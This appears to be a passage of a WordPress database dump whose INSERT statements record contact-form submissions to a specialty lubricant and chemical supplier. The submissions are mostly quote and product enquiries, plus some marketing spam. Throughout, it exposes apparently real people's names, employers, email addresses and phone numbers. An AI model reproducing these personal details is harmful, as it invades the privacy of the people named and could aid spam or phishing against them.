INSERT INTO `wp_postmeta` VALUES (31990, 3569, '_field_1', 'mark hales'); 
INSERT INTO `wp_postmeta` VALUES (31991, 3569, '_field_10', 'veite cryogenic sales &amp; equipment'); 
INSERT INTO `wp_postmeta` VALUES (31992, 3569, '_field_2', 'mark.hales@veitecryogenic.com'); 
INSERT INTO `wp_postmeta` VALUES (31993, 3569, '_field_8', '(440) 327-2492'); 
INSERT INTO `wp_postmeta` VALUES (31994, 3569, '_field_3', 'we currently purchase krytox gpl-226 grease from you , was wondering if you also carry a vacuum grease? the Krytox LVP H-797855-4 grease \r\nand if you do size and price its can be bought in would be helpful \r\nthank you'); 
INSERT INTO `wp_postmeta` VALUES (31995, 3569, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (31996, 3569, '_sub_id', '3569'); 
INSERT INTO `wp_postmeta` VALUES (31997, 3570, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (31998, 3570, '_seq_num', '216'); 
INSERT INTO `wp_postmeta` VALUES (31999, 3570, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (32000, 3570, '_field_12', 'Zhifei Ge'); 
INSERT INTO `wp_postmeta` VALUES (32001, 3570, '_field_13', 'MIT'); 
INSERT INTO `wp_postmeta` VALUES (32002, 3570, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (32003, 3570, '_field_14', 'zhifeige@mit.edu'); 
INSERT INTO `wp_postmeta` VALUES (32004, 3570, '_field_15', '(857) 526-1195'); 
INSERT INTO `wp_postmeta` VALUES (32005, 3570, '_field_16', 'I&#039;m looking for epoxy that have hydrophilic surfaces after curing.  If you have any suggestions, would you please give me a call.'); 
INSERT INTO `wp_postmeta` VALUES (32006, 3570, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (32007, 3570, '_sub_id', '3570'); 
INSERT INTO `wp_postmeta` VALUES (32008, 3571, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (32009, 3571, '_seq_num', '217'); 
INSERT INTO `wp_postmeta` VALUES (32010, 3571, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (32011, 3571, '_field_12', 'Steen Bidelman'); 
INSERT INTO `wp_postmeta` VALUES (32012, 3571, '_field_13', 'Aerojet Rocketdyne'); 
INSERT INTO `wp_postmeta` VALUES (32013, 3571, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (32014, 3571, '_field_14', 'steen.bidelman@rocket.com'); 
INSERT INTO `wp_postmeta` VALUES (32015, 3571, '_field_15', ''); 
INSERT INTO `wp_postmeta` VALUES (32016, 3571, '_field_16', 'I have a question about self life for your product 250AD - Krytox Grease syringe.\r\nOne of lots that I have it shows:\r\nLot: G1029/2755\r\nS/L: Indefinite\r\nand a Date of MFG: 08/07\r\nwith a Warranty: two(2) years from the date of shipment\r\nand Warranty Ends: 05/18\r\n\r\nThen on another one I see the following:\r\nLot: G7536/1135\r\nS/L: 24 Months\r\nand a Date of MFG: 09/14\r\nwith a Warranty: two(2) years from the date of shipment\r\nand Warranty Ends: 04/17\r\n\r\nSo what I want to know is why on one you are showing and Indefinite Shelf Life and on the other you are\r\nonly showing a 24 Month Shelf Life? I understand that it really doesn&#039;t matter until you ship the material \r\nbut it may cause some confusion. \r\n\r\nRegards,\r\n\r\nSteen\r\n\r\n\r\n'); 
INSERT INTO `wp_postmeta` VALUES (32017, 3571, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (32018, 3571, '_sub_id', '3571'); 
INSERT INTO `wp_postmeta` VALUES (32019, 3572, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (32020, 3572, '_seq_num', '307'); 
INSERT INTO `wp_postmeta` VALUES (32021, 3572, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (32022, 3572, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (32023, 3572, '_field_1', 'Mike Smith'); 
INSERT INTO `wp_postmeta` VALUES (32024, 3572, '_field_10', 'SEO Service'); 
INSERT INTO `wp_postmeta` VALUES (32025, 3572, '_field_2', 'seo3@googlepositions.com'); 
INSERT INTO `wp_postmeta` VALUES (32026, 3572, '_field_8', '(707) 706-0205'); 
INSERT INTO `wp_postmeta` VALUES (32027, 3572, '_field_3', ' Hello and good morning\r\n \r\nI am Mike Alias Sanjeev, Marketing Manager with a reputable online marketing company based in India.\r\n\r\nWe can fairly quickly promote your website to the top of the search rankings with no long term contracts!\r\n\r\nWe can place your website on top of the Natural Listings on Google, Yahoo and MSN. Our Search Engine Optimization team delivers more top rankings than anyone else and we can prove it. We do not use &quot;link farms&quot; or &quot;black hat&quot; methods that Google and the other search engines frown upon and can use to de-list or ban your site. The techniques are proprietary, involving some valuable closely held trade secrets. Our prices are less than half of what other companies charge.\r\n\r\nWe would be happy to send you a proposal using the top search phrases for your area of expertise. Please contact me at your convenience so we can start saving you some money.\r\n\r\nIn order for us to respond to your request for information, please include your company’s website address (mandatory) and or phone number.\r\n\r\nSo let me know if you would like me to mail you more details or schedule a call. We&#039;ll be pleased to serve you.\r\nI look forward to your mail.\r\n\r\nThanks and Regards\r\nMike Alias Sanjeev\r\n'); 
INSERT INTO `wp_postmeta` VALUES (32028, 3572, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (32029, 3572, '_sub_id', '3572'); 
INSERT INTO `wp_postmeta` VALUES (32030, 3574, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (32031, 3574, '_seq_num', '218'); 
INSERT INTO `wp_postmeta` VALUES (32032, 3574, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (32033, 3574, '_field_12', 'Tom Rein'); 
INSERT INTO `wp_postmeta` VALUES (32034, 3574, '_field_13', 'Solid Sealing Technology'); 
INSERT INTO `wp_postmeta` VALUES (32035, 3574, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (32036, 3574, '_field_14', 'trein@solidsealing.com'); 
INSERT INTO `wp_postmeta` VALUES (32037, 3574, '_field_15', '(518) 874-3626'); 
INSERT INTO `wp_postmeta` VALUES (32038, 3574, '_field_16', 'Are the following solvents labelled as RoHS compliant?: Vertrel SDG, Vertrel SFR, Opteon Sion'); 
INSERT INTO `wp_postmeta` VALUES (32039, 3574, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (32040, 3574, '_sub_id', '3574'); 
INSERT INTO `wp_postmeta` VALUES (32041, 3575, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (32042, 3575, '_seq_num', '308'); 
INSERT INTO `wp_postmeta` VALUES (32043, 3575, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (32044, 3575, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (32045, 3575, '_field_1', 'RANDY'); 
INSERT INTO `wp_postmeta` VALUES (32046, 3575, '_field_10', 'BERRY PLASTICS'); 
INSERT INTO `wp_postmeta` VALUES (32047, 3575, '_field_2', 'randygrant@berryplastics.com'); 
INSERT INTO `wp_postmeta` VALUES (32048, 3575, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (32049, 3575, '_field_3', 'need a quote for 6 each of item KRYGPL227CART, may be item GP227\r\n\r\nTHANKS!'); 
INSERT INTO `wp_postmeta` VALUES (32050, 3575, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (32051, 3575, '_sub_id', '3575'); 
INSERT INTO `wp_postmeta` VALUES (32052, 3576, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (32053, 3576, '_seq_num', '309'); 
INSERT INTO `wp_postmeta` VALUES (32054, 3576, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (32055, 3576, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (32056, 3576, '_field_1', 'rick grossman'); 
INSERT INTO `wp_postmeta` VALUES (32057, 3576, '_field_10', 'proforma winning edge'); 
INSERT INTO `wp_postmeta` VALUES (32058, 3576, '_field_2', 'rick.grossman@proforma.com'); 
INSERT INTO `wp_postmeta` VALUES (32059, 3576, '_field_8', '(203) 488-1447'); 
INSERT INTO `wp_postmeta` VALUES (32060, 3576, '_field_3', 'I own Proforma Winning Edge in Branford, CT.  We are part of the Proforma Group of companies that together make up the largest distributor in the U.S. for Printing Collateral* and Promotional Products/Apparel**.  We do approximately 500 million dollars in sales.  I have been in the industry for over 38 years and would love to have the opportunity to work with your company when any of these projects are being considered or going out for bid.  I look forward to hearing from you.\r\n\r\n \r\n\r\n*-Catalogs, direct mail, labels, business forms and stationery,signage,anything with ink on paper or any other substrate\r\n\r\n \r\n\r\n**-any item that you may use for customers, employees, or at tradeshows or events that would have your name/logo on it.\r\n\r\n \r\n\r\nRick Grossman\r\nProforma Winning Edge\r\nBranford, CT 06405\r\n203-488-1447-B\r\n203-481-6730-F\r\n203-675-1905-C\r\nrick.grossman@proforma.com\r\nwww.proforma.com/winningedge\r\n\r\n \r\n\r\nTAKING YOUR BRAND FROM BEING SEEN TO BEING REMEMBERED\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n'); 
INSERT INTO `wp_postmeta` VALUES (32061, 3576, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (32062, 3576, '_sub_id', '3576'); 
INSERT INTO `wp_postmeta` VALUES (32063, 3577, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (32064, 3577, '_seq_num', '310'); 
INSERT INTO `wp_postmeta` VALUES (32065, 3577, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (32066, 3577, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (32067, 3577, '_field_1', 'Edward Martin'); 
INSERT INTO `wp_postmeta` VALUES (32068, 3577, '_field_10', 'Acute Marketing Solutions Inc.'); 
INSERT INTO `wp_postmeta` VALUES (32069, 3577, '_field_2', 'edward@acutemarketingsolutions.com'); 
INSERT INTO `wp_postmeta` VALUES (32070, 3577, '_field_8', '(515) 861-6600'); 
INSERT INTO `wp_postmeta` VALUES (32071, 3577, '_field_3', 'Hi, \r\n\r\nI hope you are the right person to discuss about the Database for commercial, civil and military space and aerospace sectors.\r\n\r\nThe database includes complete contact details and verified email addresses of - Engineer/engineering Manager,Sales Manager/Director/Business Development, CE/president/VP/MD, Marketing, Project/Program Manager/Lead, Consultant, Owner/Founder, Student, Buyer/Purchaser/Procurement, CTO/Technical Lead,Operations, Research &amp; Development, Academic/Professor, Scientist &amp; Other Industry Professionals.\r\n\r\nKindly let me know your target criteria so that we can provide you exact counts, cost and few free samples.\r\n\r\nTarget Audience:\r\nTarget Job-title:\r\nTarget Geography:\r\n\r\nRegards,\r\nEdward Martin\r\nMarketing Manager\r\n'); 
INSERT INTO `wp_postmeta` VALUES (32072, 3577, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (32073, 3577, '_sub_id', '3577'); 
INSERT INTO `wp_postmeta` VALUES (32074, 3578, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (32075, 3578, '_seq_num', '311'); 
INSERT INTO `wp_postmeta` VALUES (32076, 3578, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (32077, 3578, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (32078, 3578, '_field_1', 'paul dabrowski'); 
INSERT INTO `wp_postmeta` VALUES (32079, 3578, '_field_10', 'EXCELVAC, Inc.'); 
INSERT INTO `wp_postmeta` VALUES (32080, 3578, '_field_2', 'paul.dabrowski@excelvac.com'); 
INSERT INTO `wp_postmeta` VALUES (32081, 3578, '_field_8', '(443) 797-2719'); 
INSERT INTO `wp_postmeta` VALUES (32082, 3578, '_field_3', 'Can you please quote me for the oil listed below?\r\n\r\nFomblin Y25, Krytox 1525 \r\nQnty: 2.8 litres\r\nGrade of oil: SAE 40\r\nISO viscosity grade: 150 \r\n\r\nFomblin Y16/6 or Krytox 1514\r\nQnty: 1.625 liters'); 
INSERT INTO `wp_postmeta` VALUES (32083, 3578, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (32084, 3578, '_sub_id', '3578'); 
INSERT INTO `wp_postmeta` VALUES (32085, 3579, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (32086, 3579, '_seq_num', '312'); 
INSERT INTO `wp_postmeta` VALUES (32087, 3579, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (32088, 3579, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (32089, 3579, '_field_1', 'Ed Miesak'); 
INSERT INTO `wp_postmeta` VALUES (32090, 3579, '_field_10', 'Coherent'); 
INSERT INTO `wp_postmeta` VALUES (32091, 3579, '_field_2', 'emiesak@leelaser.com'); 
INSERT INTO `wp_postmeta` VALUES (32092, 3579, '_field_8', '(407) 812-4611'); 
INSERT INTO `wp_postmeta` VALUES (32093, 3579, '_field_3', 'I&#039;m looking for a krytox grease GPL205 but had no luck on your website. '); 
INSERT INTO `wp_postmeta` VALUES (32094, 3579, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (32095, 3579, '_sub_id', '3579'); 
INSERT INTO `wp_postmeta` VALUES (32096, 3580, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (32097, 3580, '_seq_num', '313'); 
INSERT INTO `wp_postmeta` VALUES (32098, 3580, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (32099, 3580, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (32100, 3580, '_field_1', 'Larry Alvarez'); 
INSERT INTO `wp_postmeta` VALUES (32101, 3580, '_field_10', 'EIS  Incorporated'); 
INSERT INTO `wp_postmeta` VALUES (32102, 3580, '_field_2', 'LALVAREZ@EIS-INC.COM'); 
INSERT INTO `wp_postmeta` VALUES (32103, 3580, '_field_8', '(915) 519-3512'); 
INSERT INTO `wp_postmeta` VALUES (32104, 3580, '_field_3', 'I would like to get pricing and availability on 50, 2oz tubes, Krytox GPL205? please send a quote?'); 
INSERT INTO `wp_postmeta` VALUES (32105, 3580, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (32106, 3580, '_sub_id', '3580'); 
INSERT INTO `wp_postmeta` VALUES (32107, 3581, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (32108, 3581, '_seq_num', '314'); 
INSERT INTO `wp_postmeta` VALUES (32109, 3581, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (32110, 3581, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (32111, 3581, '_field_1', 'Daniel Kratz'); 
INSERT INTO `wp_postmeta` VALUES (32112, 3581, '_field_10', 'Wesco Aircraft'); 
INSERT INTO `wp_postmeta` VALUES (32113, 3581, '_field_2', 'daniel.kratz@wescoair.com'); 
INSERT INTO `wp_postmeta` VALUES (32114, 3581, '_field_8', '(512) 519-3905'); 
INSERT INTO `wp_postmeta` VALUES (32115, 3581, '_field_3', 'Good Morning,\r\n\r\nI need to document the following data specs for the product Chiller Component Spray MS-242N-AS Anti-Static Quik-Freeze - (in re: Material ID 11912).\r\n\r\n-     Regulatory VOC\r\n-     Regulatory VOCLWES (less water and exempts)\r\n\r\n\r\nThese points were not provided separately on the SDS and is a requirement for my customer, Lockheed Martin, for reporting purposes.\r\n\r\nPlease let me know if you have any questions.\r\n'); 
INSERT INTO `wp_postmeta` VALUES (32116, 3581, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (32117, 3581, '_sub_id', '3581'); 
INSERT INTO `wp_postmeta` VALUES (32118, 3582, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (32119, 3582, '_seq_num', '315'); 
INSERT INTO `wp_postmeta` VALUES (32120, 3582, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (32121, 3582, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (32122, 3582, '_field_1', 'Daniel Kratz'); 
INSERT INTO `wp_postmeta` VALUES (32123, 3582, '_field_10', 'Wesco Aircraft'); 
INSERT INTO `wp_postmeta` VALUES (32124, 3582, '_field_2', 'daniel.kratz@wescoair.com'); 
INSERT INTO `wp_postmeta` VALUES (32125, 3582, '_field_8', '(512) 519-3905'); 
INSERT INTO `wp_postmeta` VALUES (32126, 3582, '_field_3', 'Good Morning,\r\n\r\nI need to document the following data specs for the product MS-122XD PTFE Release Agent/ Dry Lubricant (Formerly DPMS-Z0612A) - (in re: Material ID 139846).\r\n-     Regulatory VOC\r\n-     Regulatory VOCLWES (less water and exempts)\r\n\r\nThese points were not provided separately on the SDS and is a requirement for my customer, Lockheed Martin, for reporting purposes.\r\n\r\nPlease let me know if you have any questions.\r\n'); 
INSERT INTO `wp_postmeta` VALUES (32127, 3582, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (32128, 3582, '_sub_id', '3582'); 
INSERT INTO `wp_postmeta` VALUES (32129, 3583, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (32130, 3583, '_seq_num', '316'); 
INSERT INTO `wp_postmeta` VALUES (32131, 3583, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (32132, 3583, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (32133, 3583, '_field_1', 'Rocio Reyes'); 
INSERT INTO `wp_postmeta` VALUES (32134, 3583, '_field_10', 'Dixie Chemical'); 
INSERT INTO `wp_postmeta` VALUES (32135, 3583, '_field_2', 'rreyes@dixiechemical.com'); 
INSERT INTO `wp_postmeta` VALUES (32136, 3583, '_field_8', '(281) 474-3271'); 
INSERT INTO `wp_postmeta` VALUES (32137, 3583, '_field_3', 'I will like to get a quote to be able to buy 10-15 gallons of Epon 828.'); 
INSERT INTO `wp_postmeta` VALUES (32138, 3583, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (32139, 3583, '_sub_id', '3583'); 
INSERT INTO `wp_postmeta` VALUES (32140, 3584, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (32141, 3584, '_seq_num', '317'); 
INSERT INTO `wp_postmeta` VALUES (32142, 3584, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (32143, 3584, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (32144, 3584, '_field_1', 'Lourdito M. Olleres'); 
INSERT INTO `wp_postmeta` VALUES (32145, 3584, '_field_10', 'ASTRI'); 
INSERT INTO `wp_postmeta` VALUES (32146, 3584, '_field_2', 'lourdito@astri.org'); 
INSERT INTO `wp_postmeta` VALUES (32147, 3584, '_field_8', '(852) 340-6268'); 
INSERT INTO `wp_postmeta` VALUES (32148, 3584, '_field_3', 'Do you have a agent or distributor in HK. I am interested on the PTFE release agent.'); 
INSERT INTO `wp_postmeta` VALUES (32149, 3584, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (32150, 3584, '_sub_id', '3584'); 
INSERT INTO `wp_postmeta` VALUES (32151, 3585, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (32152, 3585, '_seq_num', '318'); 
INSERT INTO `wp_postmeta` VALUES (32153, 3585, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (32154, 3585, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (32155, 3585, '_field_1', 'matt Messer'); 
INSERT INTO `wp_postmeta` VALUES (32156, 3585, '_field_10', 'Roush Industies'); 
INSERT INTO `wp_postmeta` VALUES (32157, 3585, '_field_2', 'matt.messer@roush.com'); 
INSERT INTO `wp_postmeta` VALUES (32158, 3585, '_field_8', '(313) 294-8213'); 
INSERT INTO `wp_postmeta` VALUES (32159, 3585, '_field_3', 'Please provide price and timing for 2cases each of MS-580N and MS-222N.\nThank You'); 
INSERT INTO `wp_postmeta` VALUES (32160, 3585, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (32161, 3585, '_sub_id', '3585'); 
INSERT INTO `wp_postmeta` VALUES (32162, 3587, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (32163, 3587, '_seq_num', '319'); 
INSERT INTO `wp_postmeta` VALUES (32164, 3587, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (32165, 3587, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (32166, 3587, '_field_1', 'JoAnne Fitzpatrick'); 
INSERT INTO `wp_postmeta` VALUES (32167, 3587, '_field_10', ''); 
INSERT INTO `wp_postmeta` VALUES (32168, 3587, '_field_2', 'joanne.fitzpatrick@navy.mil'); 
INSERT INTO `wp_postmeta` VALUES (32169, 3587, '_field_8', '(301) 744-4313'); 
INSERT INTO `wp_postmeta` VALUES (32170, 3587, '_field_3', 'Please provide a MSDS for MS470S'); 
INSERT INTO `wp_postmeta` VALUES (32171, 3587, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (32172, 3587, '_sub_id', '3587'); 
INSERT INTO `wp_postmeta` VALUES (32173, 3588, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (32174, 3588, '_seq_num', '320'); 
INSERT INTO `wp_postmeta` VALUES (32175, 3588, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (32176, 3588, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (32177, 3588, '_field_1', 'Katharine Posner'); 
INSERT INTO `wp_postmeta` VALUES (32178, 3588, '_field_10', ''); 
INSERT INTO `wp_postmeta` VALUES (32179, 3588, '_field_2', 'katharine.posner@navy.mil'); 
INSERT INTO `wp_postmeta` VALUES (32180, 3588, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (32181, 3588, '_field_3', 'Good Morning,\n\nI am a librarian at Naval Air Warfare Center - China Lake.  I have a patron looking for the specification or specifications that define MS-907 2-part epoxy.  I have searched our parts database and can find no affiliated specifications or standards.  Would you be able to provide this information to assist me in serving my patron&#039;s need?\n\nI would be very appreciative for any and all assistance.\n\nSincerely,  \nKatharine Posner, Librarian\nNAWCWD\nTechnical Library, Code 4G0000D\n1 Administration Circle STOP 6203\nChina Lake, CA 93555-6100\n(760) 939-3510\nkatharine.posner@navy.mil\n'); 
INSERT INTO `wp_postmeta` VALUES (32182, 3588, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (32183, 3588, '_sub_id', '3588'); 
INSERT INTO `wp_postmeta` VALUES (32184, 3589, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (32185, 3589, '_seq_num', '321'); 
INSERT INTO `wp_postmeta` VALUES (32186, 3589, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (32187, 3589, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (32188, 3589, '_field_1', 'John Niskala'); 
INSERT INTO `wp_postmeta` VALUES (32189, 3589, '_field_10', 'Olsa USA'); 
INSERT INTO `wp_postmeta` VALUES (32190, 3589, '_field_2', 'jniskala@olsausa.com'); 
INSERT INTO `wp_postmeta` VALUES (32191, 3589, '_field_8', '(484) 502-7239'); 
INSERT INTO `wp_postmeta` VALUES (32192, 3589, '_field_3', 'Hello i need to get a quote on some oils.\r\nWould you be able to help me?\r\n Do you sell these materials? \r\n \r\n1 Lt Oil for  lifting column \r\noil Blasia 220 Agip ISO 3448\r\nor similar oil\r\n\r\n1 kg fat for  lifting column\r\nIndustrial fat Novalube GL2 \r\nor similar industrial fat\r\n\r\n1 kg fat for  lifting column shaft centering device \r\nIndustrial fat for centering devise Piros 2\r\nor similar industrial fat\r\n\r\nif you do please contact me back at jniskala@olsausa.com or cell phone 484-502-7239  and office phone # 631-588-6572\r\ni need to get an answer today.\r\n\r\n     thank yo\r\n\r\n'); 
INSERT INTO `wp_postmeta` VALUES (32193, 3589, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (32194, 3589, '_sub_id', '3589'); 
INSERT INTO `wp_postmeta` VALUES (32195, 3590, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (32196, 3590, '_seq_num', '219'); 
INSERT INTO `wp_postmeta` VALUES (32197, 3590, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (32198, 3590, '_field_12', 'Navid Omidbakhsh'); 
INSERT INTO `wp_postmeta` VALUES (32199, 3590, '_field_13', 'Advanced Sterilization Products'); 
INSERT INTO `wp_postmeta` VALUES (32200, 3590, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (32201, 3590, '_field_14', 'nomidbak@its.jnj.com'); 
INSERT INTO `wp_postmeta` VALUES (32202, 3590, '_field_15', '(949) 453-6493'); 
INSERT INTO `wp_postmeta` VALUES (32203, 3590, '_field_16', 'We&#039;d like to replace molybdenium disulfide lubricant with another dry lubricant which is not reactive to oxidizers and humidity. Currently we use MoS2 in a medical device but it is exposed to hydrogen peroxide gas and generates corrosive by-products. The operating temperature is around 10C-80C. The lubricant should be also resistant to vacuum.\nThanks,\nNavid Omidbakhsh, PhD\nLead, Early R&amp;D\nAdvanced Sterilization Products, a Johnson &amp; Johnson company'); 
INSERT INTO `wp_postmeta` VALUES (32204, 3590, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (32205, 3590, '_sub_id', '3590'); 
INSERT INTO `wp_postmeta` VALUES (32206, 3591, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (32207, 3591, '_seq_num', '322'); 
INSERT INTO `wp_postmeta` VALUES (32208, 3591, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (32209, 3591, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (32210, 3591, '_field_1', 'WARREN ISAAC'); 
INSERT INTO `wp_postmeta` VALUES (32211, 3591, '_field_10', 'RENEWABLE CONCEPTS'); 
INSERT INTO `wp_postmeta` VALUES (32212, 3591, '_field_2', 'WISAAC@RENEWABLECONCEPT.COM'); 
INSERT INTO `wp_postmeta` VALUES (32213, 3591, '_field_8', '(620) 431-4141'); 
INSERT INTO `wp_postmeta` VALUES (32214, 3591, '_field_3', 'DO YOU CARRY FUCHS PRODUCTS?--WE SERVICE THE WIND INDUSTRY'); 
INSERT INTO `wp_postmeta` VALUES (32215, 3591, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (32216, 3591, '_sub_id', '3591'); 
INSERT INTO `wp_postmeta` VALUES (32217, 3592, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (32218, 3592, '_seq_num', '323'); 
INSERT INTO `wp_postmeta` VALUES (32219, 3592, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (32220, 3592, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (32221, 3592, '_field_1', 'Alice Miller'); 
INSERT INTO `wp_postmeta` VALUES (32222, 3592, '_field_10', 'Cross Link Marketing'); 
INSERT INTO `wp_postmeta` VALUES (32223, 3592, '_field_2', 'alice@crosslinkmarketing.com'); 
INSERT INTO `wp_postmeta` VALUES (32224, 3592, '_field_8', '(515) 861-6600'); 
INSERT INTO `wp_postmeta` VALUES (32225, 3592, '_field_3', 'Hi,\r\n\r\nWould you be interested in discussing about the updated database of Electric &amp; Hybrid Vehicles.\r\n\r\n\r\nDatabase includes complete contact details and verified email addresses of these Audience: Vehicle OEM, Drivetrain, Component Supplier, Design &amp; Simulation, Testing, Equipment Supplier, Testing &amp; Certification Services, Automation Equipment, Government, Battery Manufacturer, Raw Material Supplier, Power Management, Engineering Services, Consultancy, Financial Services, Research &amp; Development and many more.\r\n\r\nKindly let me know your target criteria so that we can provide you exact counts and cost based on your requirements.\r\n\r\nTarget Industry  :\r\nTarget Audience  :\r\nTarget Job Title :\r\nTarget Geography :\r\n\r\nBest Regards,\r\nAlice Miller\r\nMarketing Manager\r\n\r\nIf you do not wish to receive further Emails Kindly reply with &quot;Leave-Out&quot;.'); 
INSERT INTO `wp_postmeta` VALUES (32226, 3592, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (32227, 3592, '_sub_id', '3592'); 
INSERT INTO `wp_postmeta` VALUES (32228, 3593, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (32229, 3593, '_seq_num', '324'); 
INSERT INTO `wp_postmeta` VALUES (32230, 3593, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (32231, 3593, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (32232, 3593, '_field_1', 'don anders'); 
INSERT INTO `wp_postmeta` VALUES (32233, 3593, '_field_10', 'veteransinitiative.org'); 
